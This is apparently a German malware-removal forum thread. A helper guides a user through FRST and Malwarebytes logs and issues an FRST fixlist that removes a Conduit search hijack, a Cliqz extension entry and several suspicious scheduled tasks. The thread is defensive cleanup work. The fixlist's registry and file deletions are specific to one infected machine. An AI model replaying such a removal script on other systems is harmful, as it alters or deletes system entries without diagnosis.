FirewallRules: [{4D8AD6F5-E15E-42D7-900E-F5CF7C66F18D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{804B76B7-81D0-4E6C-B3B4-FB3FE61D906E}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{19FE12BD-5FC0-42A9-8DDC-B9341ECE8035}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [{F6026884-630E-4C24-8660-C5E9F3149291}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{BAF800C1-4858-4E81-AAA1-5780BF1D964C}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
FirewallRules: [{8CC7783F-D8C9-4A9B-8EB6-41D53FB062EA}] => (Allow) C:\Program Files (x86)\Maxthon\Bin\MxUp.exe
FirewallRules: [TCP Query User{940C46C6-246A-46A5-B467-A27182698428}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4E9D9BF5-3C86-4073-8E64-0AFE455126B7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{6B12E4F9-CDC9-43DB-83C4-110775A1D429}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [UDP Query User{C2165E93-9A8C-4891-A7D0-4DD9D43D2DEB}C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe] => (Allow) C:\program files (x86)\gameforgelive\games\deu_deu\aion\nclauncher.exe
FirewallRules: [{0266C16B-9DB0-45AB-BDD1-F548726A58D5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{773C6A1C-230F-452A-93C5-0FC1E4ABA5CB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{AAC0A1FB-6DFC-48E8-B16F-0B4F3298645F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{366A568C-F27E-4DC5-848A-F4B53B92FCFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{21B94E54-1DD2-4BF8-8F8D-C93DB82A0732}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{8D8D07C1-334E-4BD2-B252-CBCD0B52002F}C:\program files\java\jre7\bin\javaw.exe] => (Allow) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{05A0E04F-8AAF-4A75-BB40-4AFC757DD5FF}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [{C11F5AA4-5B00-4016-A476-CE3CBF976E8D}] => (Block) C:\program files\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{51A23985-93D0-4E0D-8F5C-BF39FFEC4644}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{4B828C4D-0982-487B-8883-D60F9FA4BAAE}C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\bilder\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{B7255A14-3607-4171-9CD6-F3BDC9B8B9E6}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{F3B2B4AA-7F9D-474F-95C6-E16EFA8C9AA9}] => (Allow) C:\Users\Özkan\Documents\logs\Downloads\PBPHInstaller.exe
FirewallRules: [{34970EB3-AF92-4064-AEB5-9560FA11B08F}] => (Allow) C:\Users\Özkan\Documents\my games\PB\GameData\ggdllhost.exe
FirewallRules: [{2AC5FFB5-A3F7-4FAB-BC03-C85A8E1644EA}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\ggdllhost.exe
FirewallRules: [TCP Query User{9E19711D-48FE-4E48-A1B6-3C60ADECE9B5}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [UDP Query User{97AEAA5A-B3B7-4B54-A56E-89642AC83A9D}C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe] => (Allow) C:\users\özkan\documents\my games\pb\gamedata\updatemanager.exe
FirewallRules: [{245A956D-8AE0-44ED-94A2-5A64174DBB0D}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [{EBB5EF62-323E-4338-A3DA-A72903F9C975}] => (Allow) C:\Users\Özkan\Documents\my games\PB\gamedata\Apps\PB\PointBlank.exe
FirewallRules: [TCP Query User{B11EA2A9-155D-44B0-9ACE-908512AA000A}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{00A2042E-C388-4F6C-8920-B20565A77CAF}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{C5C5DA2C-5336-480B-AEF7-C0F37A75F090}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [UDP Query User{3C3BEC0A-FF69-4BE2-A48D-736D61978D94}C:\nexon\combat arms eu\engine.exe] => (Block) C:\nexon\combat arms eu\engine.exe
FirewallRules: [TCP Query User{EDAA3D02-CDD5-48A2-8916-444CC0384F0C}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2C2A5F9A-68C3-4A9A-85FF-73CB7DB44762}C:\users\özkan\appdata\local\akamai\netsession_win.exe] => (Block) C:\users\özkan\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{6CE5FEB5-A568-4611-8849-0BF6CC500E54}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{7D7C9632-5344-4D54-B217-A0708A7A0D69}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{DB391465-5607-4DF5-8EFD-68EC00796E86}] => (Allow) LPort=49167
FirewallRules: [{B70F1942-FCA8-48D6-BC69-5A1656946DE3}] => (Allow) LPort=5000
FirewallRules: [{E746A689-6A3F-43C1-B4DB-417A6A94FFB2}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [{CA0FC397-EA45-471B-81B7-D14162A6176F}] => (Allow) C:\Program Files (x86)\GameforgeLive\Games\DEU_deu\Elsword\data\x2.exe
FirewallRules: [TCP Query User{AD6D5770-A47B-400B-80CA-B1C5E921F286}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{D326B361-0FAC-423D-A8CF-CEF634518F79}C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\my games\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{1CA208CC-0E60-4D7A-9F95-D647FFE96F58}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [UDP Query User{B6F84916-7DA1-4560-BF08-B3F6D4B8267C}C:\program files (x86)\warlord ii\game.bin] => (Allow) C:\program files (x86)\warlord ii\game.bin
FirewallRules: [TCP Query User{4CCF479B-249D-4329-827B-06BE36F6F976}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{B8B3BF25-2D6C-4AE8-8168-93CAC43DA23C}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{4D37D830-802A-4B82-AE5C-5702D45A013C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [{4547DE26-8CE8-4BE9-8FC6-6CAD6B07F718}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{01DE63FC-FD42-48D1-8BC1-E3B7F19CB46F}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{08367BCB-2D3E-4464-9A42-C48FA412F362}C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{F369092F-4781-4874-AC7B-DB4E99FD9FF2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A1FC346F-ED08-43C6-AA21-419E63D1F90D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{22A0AB29-3F15-4578-B976-FF69A53E577F}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [UDP Query User{65FE8B49-176E-4AFE-B39E-10FEAC40F603}C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\terraria 1.2.1.2\terrariaserver.exe
FirewallRules: [TCP Query User{14016099-6DF5-4626-B91A-F0001D41369D}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{09B65F16-F90A-4E46-9528-E91A99B97B6B}C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\özkan\documents\spiele emre\emre\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{C861E8A0-8C5D-4E5D-A1AF-AEFE85D9DDCB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{FB66CB97-5B56-4B66-88FE-D7CB13FE2C9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe
FirewallRules: [{0C478274-2C5D-4403-BC56-C1E8088DDB41}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{805DD0DD-BF67-4E58-8B1E-20B33ACE9025}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5F74B1AE-2578-474A-9698-777F42CCA0AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A3D912ED-1EDF-4114-AF43-C92F0FE363FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3966C528-4AE3-462C-AEDE-2CC007CF2E37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: BitDefender Firewall NDIS 6 Filter Driver
Description: BitDefender Firewall NDIS 6 Filter Driver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer: 
Service: BdfNdisf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (12/21/2015 02:17:53 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/21/2015 01:58:47 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: steamwebhelper.exe, Version: 3.17.73.86, Zeitstempel: 0x566f1544
Name des fehlerhaften Moduls: libcef.dll, Version: 3.2526.1348.0, Zeitstempel: 0x5643e1a9
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00e2f176
ID des fehlerhaften Prozesses: 0x1194
Startzeit der fehlerhaften Anwendung: 0xsteamwebhelper.exe0
Pfad der fehlerhaften Anwendung: steamwebhelper.exe1
Pfad des fehlerhaften Moduls: steamwebhelper.exe2
Berichtskennung: steamwebhelper.exe3

Error: (12/20/2015 09:17:19 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/19/2015 08:56:15 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/19/2015 01:58:43 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 98c

Startzeit: 01d139c6e1c74cec

Endzeit: 6

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: a39ae032-a5eb-11e5-b7d2-9e2a84b93483

Error: (12/18/2015 08:04:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm ts3client_win64.exe, Version 3.0.18.2 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: ad4

Startzeit: 01d139c500347672

Endzeit: 20

Anwendungspfad: C:\Users\Özkan\AppData\Local\TeamSpeak 3 Client\ts3client_win64.exe

Berichts-ID: 188e838d-a5ba-11e5-b7d2-9e2a84b93483

Error: (12/18/2015 02:11:45 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/17/2015 04:08:55 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/16/2015 08:22:04 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005

Error: (12/16/2015 02:16:54 PM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80004005


Systemfehler:
=============
Error: (12/22/2015 12:33:23 AM) (Source: ipnathlp) (EventID: 31004) (User: )
Description: 0

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Automatische WLAN-Konfiguration" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Diagnosesystemhost" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Sitzungs-Manager für Desktopfenster-Manager" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Überwachung verteilter Verknüpfungen (Client)" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Superfetch" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Programmkompatibilitäts-Assistent-Dienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Netzwerkverbindungen" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 100 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Heimnetzgruppen-Listener" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/22/2015 12:31:21 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Offlinedateien" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Celeron(R) CPU B830 @ 1.80GHz
Prozentuale Nutzung des RAM: 34%
Installierter physikalischer RAM: 3932.36 MB
Verfügbarer physikalischer RAM: 2589.12 MB
Summe virtueller Speicher: 7862.93 MB
Verfügbarer virtueller Speicher: 6027.68 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:177.99 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: BC5E5834)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

Ich wollte es kurz dazu schreiben, bei Steam steht dann meistens unten AD by DNS Unlocker. Wird das dann auch weg sein nach dem ganzen Porzess? Danke das du mir bis hierhin weitergeholfen hast Sandra.

Bootsektor · 22.12.2015, 20:45

Hallo,

gerne.

Ja das gehört da auch nicht hin.

Kannst du mir bitte noch das Log von Malwarebytes posten, das ist nur das Protektionslog.

EmreTprk · 23.12.2015, 22:38

Das ist von Gestern

Malwarebytes Anti-Malware
www.malwarebytes.org

Suchlaufdatum: 22.12.2015
Suchlaufzeit: 22:51
Protokolldatei: mbam2.txt
Administrator: Ja

Version: 2.2.0.1024
Malware-Datenbank: v2015.12.22.06
Rootkit-Datenbank: v2015.12.18.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 7 Service Pack 1
CPU: x64
Dateisystem: NTFS
Benutzer: Özkan

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 431374
Abgelaufene Zeit: 34 Min., 9 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Dateien: 0
(keine bösartigen Elemente erkannt)

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)

(end)

Bootsektor · 26.12.2015, 10:41

Hallo,

hast du noch Probleme?

Dein Java ist übrigends uralt und muss dringend upgedated werden.

Schritt 1

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> URL hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
FF HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\m4d0ej0b.default\extensions\cliqz@cliqz.com => nicht gefunden
Task: {A04598EA-0499-4F37-9782-5B24163322DF} - \Plus-HD-5.0-codedownloader -> Keine Datei <==== ACHTUNG
Task: C:\Windows\Tasks\KYG1QOVT.job => C:\Users\�zkan\AppData\Roaming\KYG1QOVT.exe <==== ACHTUNG
Task: C:\Windows\Tasks\lm6V3l7.job => C:\Users\�zkan\AppData\Roaming\lm6V3l7.exe <==== ACHTUNG
Task: C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe <==== ACHTUNG
Task: C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe <==== ACHTUNG
C:\Windows\Tasks\KYG1QOVT.job => C:\Users\�zkan\AppData\Roaming\KYG1QOVT.exe
C:\Windows\Tasks\lm6V3l7.job => C:\Users\�zkan\AppData\Roaming\lm6V3l7.exe 
C:\Users\�zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe
C:\Users\�zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

Schritt 2
Starte noch einmal FRST.

Setze den Haken bei addition.txt und drücke auf Scan.
Wenn der Scan abgeschlossen ist, werden zwei neue Logfiles FRST.txt und addition.txt erstellt und auf dem Desktop (oder in dem Verzeichnis in dem FRST liegt) gespeichert.
Poste den Inhalt dieser Logfiles bitte hier in deinen Thread.

EmreTprk · 26.12.2015, 23:09

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:20-12-2015
durchgeführt von Özkan (2015-12-26 23:04:54) Run:1
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
SearchScopes: HKU\S-1-5-21-1539430812-113463742-2149372525-1000 -> URL hxxp://search.conduit.com/Results.aspx?gd=&ctid=CT3317933&octid=EB_ORIGINAL_CTID&ISID=ISID_ID&SearchSource=58&CUI=&UM=5&UP=SP1188471C-B9E3-4D82-BAC1-E62C126C7D6E&q={searchTerms}&SSPV=
FF HKU\S-1-5-21-1539430812-113463742-2149372525-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Özkan\AppData\Roaming\Mozilla\Firefox\Profiles\m4d0ej0b.default\extensions\cliqz@cliqz.com => nicht gefunden
Task: {A04598EA-0499-4F37-9782-5B24163322DF} - \Plus-HD-5.0-codedownloader -> Keine Datei <==== ACHTUNG
Task: C:\Windows\Tasks\KYG1QOVT.job => C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe <==== ACHTUNG
Task: C:\Windows\Tasks\lm6V3l7.job => C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe <==== ACHTUNG
Task: C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => C:\Users\?zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe <==== ACHTUNG
Task: C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => C:\Users\?zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe <==== ACHTUNG
C:\Windows\Tasks\KYG1QOVT.job => C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe
C:\Windows\Tasks\lm6V3l7.job => C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe
C:\Users\?zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe
C:\Users\?zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe

*****************

HKU\S-1-5-21-1539430812-113463742-2149372525-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\URL => Wert erfolgreich entfernt
HKU\S-1-5-21-1539430812-113463742-2149372525-1000\Software\Mozilla\Firefox\Extensions\\cliqz@cliqz.com => Wert erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A04598EA-0499-4F37-9782-5B24163322DF}" => Schlüssel erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A04598EA-0499-4F37-9782-5B24163322DF}" => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-5.0-codedownloader => Schlüssel nicht gefunden.
C:\Windows\Tasks\KYG1QOVT.job => erfolgreich verschoben
C:\Windows\Tasks\lm6V3l7.job => erfolgreich verschoben
C:\Windows\Tasks\QiQMvbuugirF3MbSxPFk0Y.job => erfolgreich verschoben
C:\Windows\Tasks\rmMkisrweHV4RuaBdLxOYzzbuC5.job => erfolgreich verschoben
"C:\Windows\Tasks\KYG1QOVT.job => C:\Users\?zkan\AppData\Roaming\KYG1QOVT.exe" => nicht gefunden.
"C:\Windows\Tasks\lm6V3l7.job => C:\Users\?zkan\AppData\Roaming\lm6V3l7.exe" => nicht gefunden.
"C:\Users\?zkan\AppData\Roaming\QiQMvbuugirF3MbSxPFk0Y.exe" => nicht gefunden.
"C:\Users\?zkan\AppData\Roaming\rmMkisrweHV4RuaBdLxOYzzbuC5.exe" => nicht gefunden.

==== Ende von Fixlog 23:04:55 ====

Code:

ATTFilter

Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:20-12-2015
durchgeführt von Özkan (Administrator) auf EASYNOTE (26-12-2015 23:06:36)
Gestartet von C:\Users\Özkan\Documents\logs\Downloads
Geladene Profile: Özkan (Verfügbare Profile: Özkan & Gast)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_WT50RP.EXE
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMworker.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LMutilps32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe
